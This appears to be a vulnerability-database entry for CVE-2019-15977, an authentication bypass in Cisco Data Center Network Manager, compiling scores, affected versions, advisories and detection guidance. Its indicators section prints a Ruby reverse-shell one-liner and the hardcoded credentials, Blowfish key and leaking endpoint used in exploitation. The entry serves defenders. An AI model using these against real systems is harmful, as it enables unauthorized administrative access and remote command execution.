CVE-2019-15977
published 2020-01-06
CVE-2019-15977: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass…
Priority P2 · 76 · high · 7.5 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
EXPLOIT
EPSS: 38.11% (98.4th percentile)
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_data_center_network_manager | >= unspecified < n/a | n/a |
| cisco | data_center_network_manager | < 11.3(1) | 11.3(1) |
| cisco | data_center_network_manager | — | — |
Detection & IOCs (extracted from sources)
command: {ruby,-rsocket,-e'c=TCPSocket.new("<ls>","<lp>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print(io.read)}end'}
snort: SID 52530 - 52547
- Monitor for unauthenticated HTTP GET requests to /serverinfo/HtmlAdaptor?action=displayServerInfos using HTTP Basic Auth with hardcoded credentials (admin:nbv_12345); this endpoint leaks DB credentials, VFS paths, and SFTP credentials used to bypass authentication.
- The exploit decrypts leaked passwords using Blowfish ECB with the static key 'jaas is the way'; presence of this key in memory or network traffic is a strong indicator of exploitation activity against DCNM.
- Alert on Set-Cookie headers from DCNM containing both JSESSIONID (56-char) and resttoken patterns in the same response, indicating successful authentication bypass and session establishment.
- CVE-2019-15977 is classified under CWE-798 (Use of Hard-coded Credentials); hunt for use of the static credential pair admin/nbv_12345 against DCNM management interfaces.
- The exploit was tested specifically against Cisco DCNM 11.2.1 ISO Virtual Appliance (VMware, KVM, Bare-metal); the hardcoded credential and Blowfish key behavior may differ across other DCNM versions.
- There are no workarounds available for these vulnerabilities; only applying Cisco's released software updates fully remediates CVE-2019-15977.
CVSS provenance
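| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.8 | HIGH | AV:N/AC:L/Au:N/C:C/I:N/A:N |
| vendor_cisco | | 9.8 | CRITICAL | |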
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco·2020-01-02·CVSS 9.8
CVE-2019-15975 [CRITICAL] CWE-798 Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2019-15977 Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
CVSS: 3.0
CWE: CWE-798
Bug IDs: CSCvq85945, CSCvq89859, CSCvq89898
GHSA
GHSA-vwxm-w88w-cmq3: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker
ghsa_unreviewed·2022-05-24
CVE-2019-15977 [HIGH] CWE-798 GHSA-vwxm-w88w-cmq3: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker
Talos
Threat Source newsletter (Jan. 9, 2019)
blogs_talos·2020-01-09
Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We’re back after a long break for the holidays. And 2020 is already off to a fast start as tensions continue to rise in the Middle East.
We’ve gotten a lot of questions about whether customers and users should be concerned about cyber attacks from Iran after they’ve exchanged missile strikes with the U.S. But the reality of the situation is, if you haven’t already been preparing from attacks for state-sponsored actors, it’s already too late. We run down our thoughts on the situation here.
We also have our first Beers with Talos episode of the new year out, where the guys run down the top threats of 2019 and talk about what less
Tenable
CVE-2019-15975, CVE-2019-15976, CVE-2019-15977: Critical Authentication Bypass Vulnerabilities in Cisco Data Center Network Manager
blogs_tenable·2020-01-02·CVSS 9.8
http://packetstormsecurity.com/files/156242/Cisco-Data-Center-Network-Manager-11.2.1-Command-Injection.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass